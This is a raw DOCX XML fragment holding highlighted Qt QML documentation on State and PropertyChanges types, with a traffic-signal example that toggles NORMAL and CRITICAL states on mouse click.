        <w:t>and the flag is</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up</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. We may model the states using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State</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type and the color and flag configurations with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PropertyChanges</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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id</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signal</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width</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</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height</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</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state</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"NORMAL"</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states</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</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name</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"NORMAL"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyChanges</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target</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signal</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color</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"green"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyChanges</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target</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flag</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state</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"FLAG_DOWN"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            name</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"CRITICAL"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyChanges</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target</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signal</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color</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"red"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyChanges</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target</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flag</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state</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"FLAG_UP"</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2429" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PropertyChanges</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type will change the values</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of object properties. Objects are referenced through their</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2430" w:anchor="the-id-attribute" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>id</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Objects outside the component are also referenced using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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property, exemplified by the property change to the external</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flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Further, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>state may change by assigning</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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state</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property with the appropriate signal state. A state switch could be in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2431" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type, assigning a different state whenever the signal receives a mouse click.</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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id</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signalswitch</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width</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>75</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height</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>75</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color</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"blue"</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</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anchors</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fill</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parent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onClicked</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if</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signal</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state </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"NORMAL"</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signal</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state </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"CRITICAL"</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>else</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signal</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state </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"NORMAL"</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> type is not limited to performing modifications on property values. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>can also</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Run some script</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2432" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>StateChangeScript</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Override an existing signal handler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for an object using</w:t>
      </w:r>
      <w:r w:rsidR="00DC3801">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2433" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PropertyChanges</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Re-parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2434" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2435" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ParentChange</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Modify anchor values</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using</w:t>
      </w:r>
      <w:r w:rsidRPr="00D911ED">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2436" w:history="1">
        <w:r w:rsidRPr="00D911ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>AnchorChanges</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00DC3801">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2057" w:name="the-default-state"/>
      <w:bookmarkStart w:id="2058" w:name="_Toc483000976"/>
      <w:bookmarkStart w:id="2059" w:name="_Toc483003967"/>
      <w:bookmarkStart w:id="2060" w:name="_Toc483604318"/>
      <w:bookmarkStart w:id="2061" w:name="_Toc483605538"/>
      <w:bookmarkEnd w:id="2057"/>
      <w:r w:rsidRPr="00DC3801">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Default State</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2058"/>
      <w:bookmarkEnd w:id="2059"/>
      <w:bookmarkEnd w:id="2060"/>
      <w:bookmarkEnd w:id="2061"/>
    </w:p>
    <w:p w:rsidR="00D911ED" w:rsidRPr="00D911ED" w:rsidRDefault="00D911ED" w:rsidP="00D911ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Every</w:t>
      </w:r>
      <w:r w:rsidR="00907F7D" w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2437" w:history="1">
        <w:r w:rsidRPr="00907F7D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00907F7D" w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based component has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00907F7D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
